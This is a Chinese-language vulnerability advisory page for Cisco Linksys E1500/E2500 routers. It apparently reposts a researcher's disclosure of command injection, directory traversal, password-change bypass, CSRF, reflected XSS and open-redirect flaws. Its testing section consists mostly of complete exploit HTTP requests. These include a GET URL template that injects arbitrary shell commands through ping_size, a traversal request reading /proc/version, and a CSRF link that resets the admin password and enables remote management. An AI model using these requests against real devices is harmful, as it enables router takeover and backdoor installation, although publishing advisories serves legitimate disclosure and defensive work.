E2500路由器多个安全漏洞

发布日期：2013-02-06
更新日期：2013-02-19受影响系统：
Cisco Linksys E1500 1.0.05 - build 1
Cisco Linksys E1500 1.0.04 - build 2
Cisco Linksys E1500 1.0.00 - build 9
Cisco Linksys E2500 1.0.03
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 57760

Cisco Linksys E1500/E2500是使用SpeedBoost技术的无线N路由器。

Linksys E1500/E2500在实现上存在命令注入漏洞、安全绕过漏洞、跨站请求伪造漏洞、跨站脚本执行漏洞、目录穿越漏洞、URI重定向漏洞。攻击者可利用这些漏洞执行任意命令、钓鱼攻击、绕过安全限制、窃取cookie、访问系统和其他配置文件、在用户会话上下文中执行未授权操作。

1, OS命令注入。
参数：ping_size=%26ping%20192%2e168%2e178%2e102%26
此漏洞源于ping_size参数缺失输入验证。
2, 目录遍历。
参数：next_page
3, 更改旧密码，无需输入当前密码。
4, CSRF漏洞，无需知道当前密码，即可更改密码。攻击者可以激活远程管理。
5, 反射跨站脚本执行。
参数：wait_time=3"%3balert（"pwnd"）//
6, 重定向漏洞
参数：submit_button=http://www.pwnd.pwnd%0a

<*来源：Michael Messner （michae.messner@integralis.com）

链接：http://www.s3cur1ty.de/node/655
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Michael Messner （michae.messner@integralis.com）提供了如下测试方法：

============ Vulnerability Overview: ============

OS Command Injection / E1500 and E2500 v1.0.03
=> Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 （Windows NT 6.1; WOW64; rv:14.0） Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Diagnostics.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.199/apply.cgi？submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
Directory traversal - tested on E1500:
=> parameter: next_page

Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 （Windows NT 6.1; WOW64; rv:16.0） Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.6.22 （cjc@t.sw3）（gcc version 4.2.3） #10 Thu Aug 23 11:16:42 HKT 2012
For changing the current password there is no request of the current password - tested on E1500
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

Example Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 （Windows NT 6.1; WOW64; rv:16.0） Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Management.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:
http://<IP>/apply.cgi？submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
Reflected Cross Site Scripting - tested on E1500
=> Parameter: wait_time=3"%3balert（"pwnd"）//

Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 （Windows NT 6.1; WOW64; rv:16.0） Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3"%3balert（"pwnd"）//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
Redirection - tested on E1500
=> Paramter: submit_button=http://www.pwnd.pwnd%0a

Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 （Windows NT 6.1; WOW64; rv:16.0） Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0建议：
--------------------------------------------------------------------------------
厂商补丁：

Cisco
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://tools.cisco.com/security/center/home.xMicrosoft Windows Kernel 本地权限提升漏洞（CVE-2013-1279）（MS13-017）ECShop插件SQL注入漏洞相关资讯 Cisco Cisco安全漏洞

Cisco Unified Communications （10/12/2015 15:11:19）
《Cisco网络技术》课程实验指导书- （08/03/2015 21:05:31）
Cisco Prime Data Center Network （09/23/2013 05:34:39）

Cisco 正为苹果设备优化其网络表现（09/01/2015 12:24:06）
Cisco 路由器启动过程详解及重置密（11/20/2013 13:57:48）
Cisco Prime Data Center Network （09/22/2013 18:17:00）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论